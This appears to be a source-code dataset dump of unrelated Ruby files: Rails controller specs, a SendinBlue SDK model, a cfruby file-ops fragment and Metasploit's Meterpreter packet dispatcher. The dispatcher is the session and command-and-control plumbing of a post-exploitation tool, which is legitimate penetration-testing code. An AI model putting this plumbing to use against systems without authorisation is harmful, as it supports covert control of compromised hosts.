if(permissions.kind_of?(Numeric))
FileUtils.chmod(permissions, filename)
else
output = Cfruby::Exec.exec("chmod '" + permissions.to_s.gsub(/'/, "\\\&") + "' '" + filename.realpath.to_s.gsub(/'/, "\\\&") + "'")
if(output[1].length > 0)
raise(FileOpsError, output.join("\n"))
end
end
if(currentmode == File.stat(filename).mode())
Cfruby.controller.attempt_abort("unchanged, already set to \"#{permissions}\"")
else
changemade = true
end
}
}
return(changemade)
end
# Methods for standard operations involving symbolic links
module FileOps::SymlinkHandler
# Returns File.stat unless it is a symbolic link not pointing
# to an existing file - in that case it returns File.lstat
def SymlinkHandler.stat(filename)
if(!filename.kind_of?(Pathname))
filename = Pathname.new(filename.to_s)
end
if(filename.symlink? and broken?(filename))
return File.lstat(filename)
end
return(File.stat(filename))
end
# the stdlib Pathname.unlink balks when removing a symlink -
# this method will call File.unlink instead when dealing with
# a symlink
def SymlinkHandler.unlink(filename)
if(!filename.kind_of?(Pathname))
filename = Pathname.new(filename.to_s)
end
if filename.symlink?()
File.unlink filename.expand_path
else
filename.unlink()
end
end
# Returns true if a file is a broken symlink
def SymlinkHandler.broken?(symlink)
if(!symlink.kind_of?(Pathname))
symlink = Pathname.new(symlink.to_s)
end
if(!symlink.symlink?())
return(false)
end
# expand the path and catch the ensuing error in the case of a broken link
begin
symlink.realpath()
rescue
if($!.kind_of?(Errno::ENOENT) and $!.to_s =~ /^no such file/i)
return(true)
else
raise($!)
end
end
return(false)
end
# Returns whether a symlink is actually pointing to +filename+.
# Both parameters may be strings or File objects. This method
# is used by Cfenjin to ascertain that when a symlink exists it
# points to the right file. It returns false when +filename+
# does not exist (i.e. symlink points to nothing).
#
# In the case +symlink+ does not exist or is not a symbolic link, a
# FileOpsWrongFiletypeError is raised.
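# Example (illustrative; paths are hypothetical):
#   SymlinkHandler.points_to?('/usr/local/bin/ruby', '/usr/local/bin/ruby19')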
def SymlinkHandler.points_to?(symlink, filename)
if(!filename.kind_of?(Pathname))
filename = Pathname.new(filename.to_s)
end
if(!symlink.kind_of?(Pathname))
symlink = Pathname.new(symlink.to_s)
end
return false if !filename.exist?
raise FileOpsWrongFiletypeError if !symlink.symlink?
return filename.realpath.to_s == symlink.realpath.to_s
end
end
private
def FileOps.strip_protocol(filename)
return(filename.to_s[/^([a-zA-Z]+:\/\/)?(.*)$/,2])
end
end
end
| 31.277778 | 137 | 0.657155 |
912e61168e0fd399ba6dab9c012569b16620dd18 | 12,513 | require 'spec_helper'
describe AnswersController do
describe "PATCH #accept" do
before { login_user }
context 'when not Question author' do
let(:question) { create(:question) }
let(:answer) { create(:answer, question: question) }
before { patch :accept, question_id: question, id: answer }
it "doesn't accept answer" do
answer.reload
expect(answer.accepted).to be_false
end
it "responds with 403 status" do
expect(response.status).to eq(403)
end
end
context 'when Question author' do
let(:question) { create(:question, user: @user) }
let(:answer) { create(:answer, question: question) }
let!(:bounty) { create(:bounty, question: question) }
before { patch :accept, question_id: question, id: answer }
it "finds Answer to accept" do
expect(assigns(:answer)).to eq(answer)
end
context 'when no Answers accepted' do
it "toggles Answer accepted value" do
expect(assigns(:answer).accepted).to be_true
end
end
context 'when Answer already accepted' do
before { patch :accept, question_id: question, id: answer }
it "toggles Answer accepted value" do
expect(assigns(:answer).accepted).to be_false
end
end
it "awards Bounty if exists" do
bounty.reload
expect(bounty.winner).to eq(answer.user)
end
it "redirects to Answer Question" do
expect(response).to redirect_to question_path(question)
end
end
context 'when Question has accepted Answer' do
let(:question) { create(:question, user: @user) }
let!(:accepted_answer) { create(:answer, question: question,
accepted: true) }
let(:answer) { create(:answer, question: question) }
before { patch :accept, question_id: question, id: answer }
it "finds Answer Question" do
expect(assigns(:question)).to eq(question)
end
it "finds already accepted answer" do
expect(assigns(:question).accepted_answer).to eq(accepted_answer)
end
it "doesn't toggle Answer accepted value" do
expect(assigns(:answer).accepted).to be_false
end
it "responds with 403 status" do
expect(response.status).to eq(403)
end
end
context 'when Answer already accepted' do
let(:question) { create(:question, user: @user) }
let(:answer) { create(:answer, question: question, accepted: true) }
before { patch :accept, question_id: question, id: answer }
it "toggles Answer accepted value to false" do
expect(assigns(:answer).accepted).to be_false
end
it "redirects to Answer Question" do
expect(response).to redirect_to question_path(question)
end
end
end
describe "GET #by_user" do
let(:user) { create(:user) }
let(:question) { create(:question) }
let(:answer) { create(:answer, question: question) }
let(:answers) { create_list(:answer, 3, user: user, question: question) }
before { get :by_user, user_id: user }
it "assigns user Answers to @answers" do
expect(assigns(:answers)).to match_array(answers)
end
it "renders :by_user view" do
expect(response).to render_template 'by_user'
end
end
describe "GET #voted" do
let(:user) { create(:user) }
let(:answer1) { create(:answer) }
let(:answer2) { create(:answer) }
let(:answer3) { create(:answer) }
before do
create(:vote, voteable: answer1, user: user)
create(:vote, voteable: answer2, user: user)
get :voted, user_id: user
end
it "assigns user Answers to @answers" do
expect(assigns(:answers)).to eq Answer.voted_by(user.id)
end
it "renders :voted view" do
expect(response).to render_template 'voted'
end
end
describe "POST #create" do
let(:question) { create(:question) }
context 'when logged in' do
before { login_user }
context "with valid attributes" do
context 'with AJAX' do
it "saves new Answer to DB" do
expect {
post :create, answer: attributes_for(:answer),
question_id: question, format: :js
}.to change(question.answers, :count).by(1)
end
it "renders :create view" do
post :create, answer: attributes_for(:answer),
question_id: question, format: :js
expect(response).to render_template 'create'
end
end
context 'without AJAX' do
it "saves new Answer to DB" do
expect {
post :create, answer: attributes_for(:answer), question_id: question
}.to change(question.answers, :count).by(1)
end
it 'redirects to answered Question' do
post :create, answer: attributes_for(:answer), question_id: question
expect(response).to redirect_to(question_path(question))
end
end
end
context "with invalid attributes" do
context 'with AJAX' do
it "doesn't save new Answer to DB" do
expect {
post :create, answer: {body: ''}, question_id: question,
format: :js
}.to change(question.answers, :count).by(0)
end
it 'renders :create view' do
post :create, answer: {body: ''}, question_id: question, format: :js
expect(response).to render_template 'create'
end
end
context 'without AJAX' do
it "doesn't save new Answer to DB" do
expect{
post :create, answer: {body: ''}, question_id: question
}.to change(question.answers, :count).by(0)
end
it 're-renders :new view' do
post :create, answer: {body: ''}, question_id: question
expect(response).to render_template 'new'
end
end
end
end
context 'when not logged in' do
it "redirects to log in page" do
post :create, answer: attributes_for(:answer), question_id: question
expect(response).to redirect_to(new_user_session_path)
end
end
end
describe 'GET #edit' do
let(:question) { create(:question) }
context 'when Answer owner' do
subject { create(:answer, question: question, user: @user) }
before do
login_user
get :edit, id: subject, question_id: question
end
it "finds Answer to edit" do
expect(assigns(:answer)).to eq(subject)
end
it { should render_template 'edit' }
end
context 'when not Answer owner' do
subject { create(:answer, question: question) }
before do
login_user
get :edit, id: subject, question_id: question
end
it { should render_template 'static/error' }
end
context 'when not logged in' do
subject { create(:answer, question: question) }
before { get :edit, id: subject, question_id: question }
it "redirects to log in page" do
expect(response).to redirect_to(new_user_session_path)
end
end
end
describe 'PATCH #update' do
before { login_user }
let(:question) { create(:question) }
subject { create(:answer, user: @user, question: question,
body: 'Not updated body. Not updated body. Not updated body.') }
context 'with valid attributes' do
context "with AJAX" do
before do
patch :update, id: subject, question_id: question, format: :js,
answer: attributes_for(:answer,
body: 'Updated body! Updated body! Updated body! Updated body!')
end
it "finds Answer to edit" do
expect(assigns(:answer)).to eq(subject)
end
it 'updates @answer body' do
subject.reload
expect(subject.body).to eq('Updated body! Updated body! Updated body! Updated body!')
end
it "renders :update view" do
expect(response).to render_template 'update'
end
end
context "without AJAX" do
before do
patch :update, id: subject, question_id: question,
answer: attributes_for(:answer,
body: 'Updated body! Updated body! Updated body! Updated body!')
end
it "finds Answer to edit" do
expect(assigns(:answer)).to eq(subject)
end
it 'updates @answer body' do
subject.reload
expect(subject.body).to eq('Updated body! Updated body! Updated body! Updated body!')
end
it "redirects to the Answer Question" do
expect(response).to redirect_to subject.question
end
end
end
context "with invalid attributes" do
before do
patch :update, id: subject, question_id: question,
answer: attributes_for(:answer, body: 'Too short')
end
it "finds Answer for update" do
expect(assigns(:answer)).to eq(subject)
end
it "doesn't change @answer attributes" do
subject.reload
expect(subject.body).to eq('Not updated body. Not updated body. Not updated body.')
end
it "re-renders :edit view" do
expect(response).to render_template 'edit'
end
end
context "when not user's Answer" do
it "doesn't change @answer attributes" do
alien_answer = create(:answer, user: create(:user), question: question,
body: 'Not updated body. Not updated body.')
patch :update, id: alien_answer, question_id: question,
answer: attributes_for(:answer, body: 'Updated body! Updated body! Updated body!')
alien_answer.reload
expect(alien_answer.body).to eq('Not updated body. Not updated body.')
end
it "responds with 403 status" do
alien_answer = create(:answer, user: create(:user), question: question,
body: 'Not updated body. Not updated body.')
patch :update, id: alien_answer, question_id: question,
answer: attributes_for(:answer, body: 'Updated body! Updated body! Updated body!')
alien_answer.reload
expect(response.status).to eq(403)
end
end
end
describe "DELETE #destroy" do
context 'when not logged in' do
let(:question) { create(:question) }
let!(:answer) { create(:answer) }
it "doesn't delete Answer from DB" do
expect {
delete :destroy, id: answer, question_id: question
}.to_not change(Answer, :count)
end
it "redirects to login path" do
delete :destroy, id: answer, question_id: question
expect(response).to redirect_to new_user_session_path
end
end
context "when user's Answer" do
before { login_user }
let(:question) { create(:question) }
let!(:answer) { create(:answer, user: @user, question: question) }
context "with AJAX" do
it "deletes the requested Answer" do
expect {
delete :destroy, id: answer, question_id: question, format: :js
}.to change(@user.answers, :count).by(-1)
end
it "renders :destroy view" do
delete :destroy, id: answer, question_id: question, format: :js
expect(response).to render_template 'destroy'
end
end
context "without AJAX" do
it "finds Answer to delete" do
delete :destroy, id: answer, question_id: question
expect(assigns(:answer)).to eq(answer)
end
it "deletes the requested Answer" do
expect {
delete :destroy, id: answer, question_id: question
}.to change(@user.answers, :count).by(-1)
end
it "redirects to Answer's Question" do
delete :destroy, id: answer, question_id: question
expect(response).to redirect_to question_path(answer.question)
end
end
end
context "when not user's Answer" do
before { login_user }
let(:question) { create(:question) }
let!(:alien_answer) { create(:answer, question: question) }
it "doesn't delete Answer from DB" do
expect {
delete :destroy, id: alien_answer, question_id: question
}.to_not change(Answer, :count)
end
it "responds with 403 status" do
delete :destroy, id: alien_answer, question_id: question
expect(response.status).to eq(403)
end
end
end
end | 30.519512 | 95 | 0.607049 |
4a6a279caf3933fc2b3099a6738c7a89d2780ad1 | 265 | module ValidModelHashes
def valid_user_hash
{ :login => String.random(10),
:email => "#{String.random}@example.com",
:password => "sekret",
:password_confirmation => "sekret"
}
end
end
| 24.090909 | 64 | 0.501887 |
4a64800fda6218f75adee082d7a32e6e96a19484 | 11,583 | =begin
#SendinBlue API
#SendinBlue provides a RESTful API that can be used with any language. With this API, you will be able to: - Manage your campaigns and get the statistics - Manage your contacts - Send transactional Emails and SMS - and much more... You can download our wrappers at https://github.com/orgs/sendinblue **Possible responses** | Code | Message | | :-------------: | ------------- | | 200 | OK. Successful Request | | 201 | OK. Successful Creation | | 202 | OK. Request accepted | | 204 | OK. Successful Update/Deletion | | 400 | Error. Bad Request | | 401 | Error. Authentication Needed | | 402 | Error. Not enough credit, plan upgrade needed | | 403 | Error. Permission denied | | 404 | Error. Object does not exist | | 405 | Error. Method not allowed | | 406 | Error. Not Acceptable |
OpenAPI spec version: 3.0.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.4.12
=end
require 'date'
module SibApiV3Sdk
class GetCampaignStats
# List Id of email campaign (only in case of get email campaign(s)(not for global stats))
attr_accessor :list_id
# Number of unique clicks for the campaign
attr_accessor :unique_clicks
# Number of total clicks for the campaign
attr_accessor :clickers
# Number of complaints (Spam reports) for the campaign
attr_accessor :complaints
# Number of delivered emails for the campaign
attr_accessor :delivered
# Number of sent emails for the campaign
attr_accessor :sent
# Number of softbounce for the campaign
attr_accessor :soft_bounces
# Number of harbounce for the campaign
attr_accessor :hard_bounces
# Number of unique openings for the campaign
attr_accessor :unique_views
# Number of unsubscriptions for the campaign
attr_accessor :unsubscriptions
# Number of openings for the campaign
attr_accessor :viewed
# Number of deferred emails for the campaign
attr_accessor :deferred
# Total number of non-delivered campaigns for a particular campaign id.
attr_accessor :return_bounce
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'list_id' => :'listId',
:'unique_clicks' => :'uniqueClicks',
:'clickers' => :'clickers',
:'complaints' => :'complaints',
:'delivered' => :'delivered',
:'sent' => :'sent',
:'soft_bounces' => :'softBounces',
:'hard_bounces' => :'hardBounces',
:'unique_views' => :'uniqueViews',
:'unsubscriptions' => :'unsubscriptions',
:'viewed' => :'viewed',
:'deferred' => :'deferred',
:'return_bounce' => :'returnBounce'
}
end
# Attribute type mapping.
def self.swagger_types
{
:'list_id' => :'Integer',
:'unique_clicks' => :'Integer',
:'clickers' => :'Integer',
:'complaints' => :'Integer',
:'delivered' => :'Integer',
:'sent' => :'Integer',
:'soft_bounces' => :'Integer',
:'hard_bounces' => :'Integer',
:'unique_views' => :'Integer',
:'unsubscriptions' => :'Integer',
:'viewed' => :'Integer',
:'deferred' => :'Integer',
:'return_bounce' => :'Integer'
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
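# Example (illustrative; the figures are hypothetical):
#   stats = SibApiV3Sdk::GetCampaignStats.new('sent' => 1000,
#     'delivered' => 980, 'uniqueViews' => 450, 'hardBounces' => 5)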
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
if attributes.has_key?(:'listId')
self.list_id = attributes[:'listId']
end
if attributes.has_key?(:'uniqueClicks')
self.unique_clicks = attributes[:'uniqueClicks']
end
if attributes.has_key?(:'clickers')
self.clickers = attributes[:'clickers']
end
if attributes.has_key?(:'complaints')
self.complaints = attributes[:'complaints']
end
if attributes.has_key?(:'delivered')
self.delivered = attributes[:'delivered']
end
if attributes.has_key?(:'sent')
self.sent = attributes[:'sent']
end
if attributes.has_key?(:'softBounces')
self.soft_bounces = attributes[:'softBounces']
end
if attributes.has_key?(:'hardBounces')
self.hard_bounces = attributes[:'hardBounces']
end
if attributes.has_key?(:'uniqueViews')
self.unique_views = attributes[:'uniqueViews']
end
if attributes.has_key?(:'unsubscriptions')
self.unsubscriptions = attributes[:'unsubscriptions']
end
if attributes.has_key?(:'viewed')
self.viewed = attributes[:'viewed']
end
if attributes.has_key?(:'deferred')
self.deferred = attributes[:'deferred']
end
if attributes.has_key?(:'returnBounce')
self.return_bounce = attributes[:'returnBounce']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
if @unique_clicks.nil?
invalid_properties.push('invalid value for "unique_clicks", unique_clicks cannot be nil.')
end
if @clickers.nil?
invalid_properties.push('invalid value for "clickers", clickers cannot be nil.')
end
if @complaints.nil?
invalid_properties.push('invalid value for "complaints", complaints cannot be nil.')
end
if @delivered.nil?
invalid_properties.push('invalid value for "delivered", delivered cannot be nil.')
end
if @sent.nil?
invalid_properties.push('invalid value for "sent", sent cannot be nil.')
end
if @soft_bounces.nil?
invalid_properties.push('invalid value for "soft_bounces", soft_bounces cannot be nil.')
end
if @hard_bounces.nil?
invalid_properties.push('invalid value for "hard_bounces", hard_bounces cannot be nil.')
end
if @unique_views.nil?
invalid_properties.push('invalid value for "unique_views", unique_views cannot be nil.')
end
if @unsubscriptions.nil?
invalid_properties.push('invalid value for "unsubscriptions", unsubscriptions cannot be nil.')
end
if @viewed.nil?
invalid_properties.push('invalid value for "viewed", viewed cannot be nil.')
end
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
return false if @unique_clicks.nil?
return false if @clickers.nil?
return false if @complaints.nil?
return false if @delivered.nil?
return false if @sent.nil?
return false if @soft_bounces.nil?
return false if @hard_bounces.nil?
return false if @unique_views.nil?
return false if @unsubscriptions.nil?
return false if @viewed.nil?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
list_id == o.list_id &&
unique_clicks == o.unique_clicks &&
clickers == o.clickers &&
complaints == o.complaints &&
delivered == o.delivered &&
sent == o.sent &&
soft_bounces == o.soft_bounces &&
hard_bounces == o.hard_bounces &&
unique_views == o.unique_views &&
unsubscriptions == o.unsubscriptions &&
viewed == o.viewed &&
deferred == o.deferred &&
return_bounce == o.return_bounce
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[list_id, unique_clicks, clickers, complaints, delivered, sent, soft_bounces, hard_bounces, unique_views, unsubscriptions, viewed, deferred, return_bounce].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BOOLEAN
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
temp_model = SibApiV3Sdk.const_get(type).new
temp_model.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 32.628169 | 839 | 0.623845 |
38983c23896f3b6b9a68be7a796fb2b87b23c85f | 137 | class AddUniqueToDeviceIdInFinders < ActiveRecord::Migration[5.0]
def change
add_index :finders, :device_id, unique: true
end
end
| 22.833333 | 65 | 0.773723 |
ed694f7591164a8a48704fffc4bcc765d09ca17f | 29 | require 'mws/reports/client'
| 14.5 | 28 | 0.793103 |
7aad03e3d1e71cb92a19f8fd483cdee5f6df50d5 | 14,997 | # -*- coding: binary -*-
require 'rex/post/meterpreter/packet_response_waiter'
require 'rex/logging'
require 'rex/exceptions'
module Rex
module Post
module Meterpreter
###
#
# Exception thrown when a request fails.
#
###
class RequestError < ArgumentError
def initialize(method, einfo, ecode=nil)
@method = method
@result = einfo
@code = ecode || einfo
end
def to_s
"#{@method}: Operation failed: #{@result}"
end
# The method that failed.
attr_reader :method
# The error result that occurred, typically a windows error message.
attr_reader :result
# The error result that occurred, typically a windows error code.
attr_reader :code
end
###
#
# Handles packet transmission, reception, and correlation,
# and processing
#
###
module PacketDispatcher
PacketTimeout = 600
##
#
# Synchronization
#
##
attr_accessor :comm_mutex
##
#
#
# Passive Dispatching
#
##
attr_accessor :passive_service, :send_queue, :recv_queue
def initialize_passive_dispatcher
self.send_queue = []
self.recv_queue = []
self.waiters = []
self.alive = true
# Ensure that there is only one leading and trailing slash on the URI
resource_uri = "/" + self.conn_id.to_s.gsub(/(^\/|\/$)/, '') + "/"
self.passive_service = self.passive_dispatcher
self.passive_service.remove_resource(resource_uri)
self.passive_service.add_resource(resource_uri,
'Proc' => Proc.new { |cli, req| on_passive_request(cli, req) },
'VirtualDirectory' => true
)
end
def shutdown_passive_dispatcher
return if not self.passive_service
# Ensure that there is only one leading and trailing slash on the URI
resource_uri = "/" + self.conn_id.to_s.gsub(/(^\/|\/$)/, '') + "/"
self.passive_service.remove_resource(resource_uri)
# If there are no more resources registered on the service, stop it entirely
if self.passive_service.resources.empty?
Rex::ServiceManager.stop_service(self.passive_service)
end
self.alive = false
self.send_queue = []
self.recv_queue = []
self.waiters = []
self.passive_service = nil
end
def on_passive_request(cli, req)
begin
resp = Rex::Proto::Http::Response.new(200, "OK")
resp['Content-Type'] = 'application/octet-stream'
resp['Connection'] = 'close'
self.last_checkin = Time.now
# If the first 4 bytes are "RECV", return the oldest packet from the outbound queue
if req.body[0,4] == "RECV"
rpkt = send_queue.shift
resp.body = rpkt || ''
begin
cli.send_response(resp)
rescue ::Exception => e
send_queue.unshift(rpkt) if rpkt
elog("Exception sending a reply to the reader request: #{cli.inspect} #{e.class} #{e} #{e.backtrace}")
end
else
resp.body = ""
if req.body and req.body.length > 0
packet = Packet.new(0)
packet.from_r(req.body)
dispatch_inbound_packet(packet)
end
cli.send_response(resp)
end
rescue ::Exception => e
elog("Exception handling request: #{cli.inspect} #{req.inspect} #{e.class} #{e} #{e.backtrace}")
end
end
##
#
# Transmission
#
##
#
# Sends a packet without waiting for a response.
#
def send_packet(packet, completion_routine = nil, completion_param = nil)
if (completion_routine)
add_response_waiter(packet, completion_routine, completion_param)
end
bytes = 0
raw = packet.to_r
err = nil
# Short-circuit send when using a passive dispatcher
if self.passive_service
send_queue.push(raw)
return raw.size # Lie!
end
if (raw)
# This mutex is used to lock out new commands during an
# active migration.
self.comm_mutex.synchronize do
begin
bytes = self.sock.write(raw)
rescue ::Exception => e
err = e
end
end
if bytes.to_i == 0
# Mark the session itself as dead
self.alive = false
# Indicate that the dispatcher should shut down too
@finish = true
# Reraise the error to the top-level caller
raise err if err
end
end
return bytes
end
#
# Sends a packet and waits up to the given time interval for a response.
#
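# Example (illustrative; assumes an established Meterpreter client):
#   request = Packet.create_request('core_channel_eof')
#   request.add_tlv(TLV_TYPE_CHANNEL_ID, 0)
#   response = client.send_request(request, 30)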
def send_request(packet, t = self.response_timeout)
if not t
send_packet(packet)
return nil
end
response = send_packet_wait_response(packet, t)
if (response == nil)
raise TimeoutError.new("Send timed out")
elsif (response.result != 0)
einfo = lookup_error(response.result)
e = RequestError.new(packet.method, einfo, response.result)
e.set_backtrace(caller)
raise e
end
return response
end
#
# Transmits a packet and waits for a response.
#
def send_packet_wait_response(packet, t)
# First, add the waiter association for the supplied packet
waiter = add_response_waiter(packet)
# Transmit the packet
if (send_packet(packet).to_i <= 0)
# Remove the waiter if we failed to send the packet.
remove_response_waiter(waiter)
return nil
end
# Wait for the supplied time interval
waiter.wait(t)
# Remove the waiter from the list of waiters in case it wasn't
# removed
remove_response_waiter(waiter)
# Return the response packet, if any
return waiter.response
end
##
#
# Reception
#
##
#
# Monitors the PacketDispatcher's sock for data in its own
# thread context and parsers all inbound packets.
#
def monitor_socket
# Skip if we are using a passive dispatcher
return if self.passive_service
self.comm_mutex = ::Mutex.new
self.waiters = []
@pqueue = []
@finish = false
@last_recvd = Time.now
@ping_sent = false
self.alive = true
# Spawn a thread for receiving packets
self.receiver_thread = Rex::ThreadFactory.spawn("MeterpreterReceiver", false) do
while (self.alive)
begin
rv = Rex::ThreadSafe.select([ self.sock.fd ], nil, nil, 0.25)
ping_time = 60
# If there's nothing to read, and it's been awhile since we
# saw a packet, we need to send a ping. We wait
# ping_time*2 seconds before deciding a session is dead.
if (not rv and self.send_keepalives and Time.now - @last_recvd > ping_time)
# If the queue is empty and we've already sent a
# keepalive without getting a reply, then this
# session is hosed, and we should give up on it.
if @ping_sent and @pqueue.empty? and (Time.now - @last_recvd > ping_time * 2)
dlog("No response to ping, session #{self.sid} is dead", LEV_3)
self.alive = false
@finish = true
break
end
# Let the packet queue processor finish up before
# we send a ping.
if not @ping_sent and @pqueue.empty?
# Our 'ping' is actually just a check for eof on
# channel id 0. This method has no side effects
# and always returns an answer (regardless of the
# existence of chan 0), which is all that's
# needed for a liveness check. The answer itself
# is unimportant and is ignored.
pkt = Packet.create_request('core_channel_eof')
pkt.add_tlv(TLV_TYPE_CHANNEL_ID, 0)
waiter = Proc.new { |response, param|
@ping_sent = false
@last_recvd = Time.now
}
send_packet(pkt, waiter)
@ping_sent = true
end
next
end
next if not rv
packet = receive_packet
@pqueue << packet if packet
@last_recvd = Time.now
rescue ::Exception
dlog("Exception caught in monitor_socket: #{$!}", 'meterpreter', LEV_1)
@finish = true
self.alive = false
break
end
end
end
# Spawn a new thread that monitors the socket
self.dispatcher_thread = Rex::ThreadFactory.spawn("MeterpreterDispatcher", false) do
begin
# Whether we're finished or not is determined by the receiver
# thread above.
while(not @finish)
if(@pqueue.empty?)
::IO.select(nil, nil, nil, 0.10)
next
end
incomplete = []
backlog = []
while(@pqueue.length > 0)
backlog << @pqueue.shift
end
#
# Prioritize message processing here
# 1. Close should always be processed at the end
# 2. Command responses always before channel data
#
tmp_command = []
tmp_channel = []
tmp_close = []
backlog.each do |pkt|
if(pkt.response?)
tmp_command << pkt
next
end
if(pkt.method == "core_channel_close")
tmp_close << pkt
next
end
tmp_channel << pkt
end
backlog = []
backlog.push(*tmp_command)
backlog.push(*tmp_channel)
backlog.push(*tmp_close)
#
# Process the message queue
#
backlog.each do |pkt|
begin
if ! dispatch_inbound_packet(pkt)
# Keep Packets in the receive queue until a handler is registered
# for them. Packets will live in the receive queue for up to
# PacketTimeout, after which they will be dropped.
#
# A common reason why there would not immediately be a handler for
# a received Packet is in channels, where a connection may
# open and receive data before anything has asked to read.
if (::Time.now.to_i - pkt.created_at.to_i < PacketTimeout)
incomplete << pkt
end
end
rescue ::Exception => e
dlog("Dispatching exception with packet #{pkt}: #{e} #{e.backtrace}", 'meterpreter', LEV_1)
end
end
# If the backlog and incomplete arrays are the same, it means
# dispatch_inbound_packet wasn't able to handle any of the
# packets. When that's the case, we can get into a situation
# where @pqueue is not empty and, since nothing else bounds this
# loop, we spin CPU trying to handle packets that can't be
# handled. Sleep here to treat that situation as though the
# queue is empty.
if (backlog.length > 0 && backlog.length == incomplete.length)
::IO.select(nil, nil, nil, 0.10)
end
@pqueue.unshift(*incomplete)
if(@pqueue.length > 100)
dlog("Backlog has grown to over 100 in monitor_socket, dropping older packets: #{@pqueue[0 .. 25].map{|x| x.inspect}.join(" - ")}", 'meterpreter', LEV_1)
@pqueue = @pqueue[25 .. 100]
end
end
rescue ::Exception => e
dlog("Exception caught in monitor_socket dispatcher: #{e.class} #{e} #{e.backtrace}", 'meterpreter', LEV_1)
ensure
self.receiver_thread.kill if self.receiver_thread
end
end
end
#
# Parses data from the dispatcher's sock and returns a Packet context
# once a full packet has been received.
#
def receive_packet
return parser.recv(self.sock)
end
#
# Stop the monitor
#
def monitor_stop
if(self.receiver_thread)
self.receiver_thread.kill
self.receiver_thread = nil
end
if(self.dispatcher_thread)
self.dispatcher_thread.kill
self.dispatcher_thread = nil
end
end
##
#
# Waiter registration
#
##
#
# Adds a waiter association with the supplied request packet.
#
def add_response_waiter(request, completion_routine = nil, completion_param = nil)
waiter = PacketResponseWaiter.new(request.rid, completion_routine, completion_param)
self.waiters << waiter
return waiter
end
#
# Notifies whoever is waiting for the supplied response,
# if anyone.
#
def notify_response_waiter(response)
self.waiters.each() { |waiter|
if (waiter.waiting_for?(response))
waiter.notify(response)
remove_response_waiter(waiter)
break
end
}
end
#
# Removes a waiter from the list of waiters.
#
def remove_response_waiter(waiter)
self.waiters.delete(waiter)
end
##
#
# Dispatching
#
##
#
# Initializes the inbound handlers.
#
def initialize_inbound_handlers
@inbound_handlers = []
end
#
# Dispatches and processes an inbound packet. If the packet is a
# response that has an associated waiter, the waiter is notified.
# Otherwise, the packet is passed onto any registered dispatch
# handlers until one returns success.
#
def dispatch_inbound_packet(packet, client = nil)
handled = false
# If no client context was provided, return self as PacketDispatcher
# is a mixin for the Client instance
if (client == nil)
client = self
end
# Update our last reply time
client.last_checkin = Time.now
# If the packet is a response, try to notify any potential
# waiters
if ((resp = packet.response?))
if (notify_response_waiter(packet))
return true
end
end
# Enumerate all of the inbound packet handlers until one handles
# the packet
@inbound_handlers.each { |handler|
handled = nil
begin
if ! resp
handled = handler.request_handler(client, packet)
else
handled = handler.response_handler(client, packet)
end
rescue ::Exception => e
dlog("Exception caught in dispatch_inbound_packet: handler=#{handler} #{e.class} #{e} #{e.backtrace}", 'meterpreter', LEV_1)
return true
end
if (handled)
break
end
}
return handled
end
#
# Registers an inbound packet handler that implements the
# InboundPacketHandler interface.
#
def register_inbound_handler(handler)
@inbound_handlers << handler
end
#
# Deregisters a previously registered inbound packet handler.
#
def deregister_inbound_handler(handler)
@inbound_handlers.delete(handler)
end
protected
attr_accessor :receiver_thread # :nodoc:
attr_accessor :dispatcher_thread # :nodoc:
attr_accessor :waiters # :nodoc:
end
end; end; end
| 26.637655 | 164 | 0.596186 |
e913a036f752a16c11194537abc6dce68346c4f8 | 5,804 | # Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
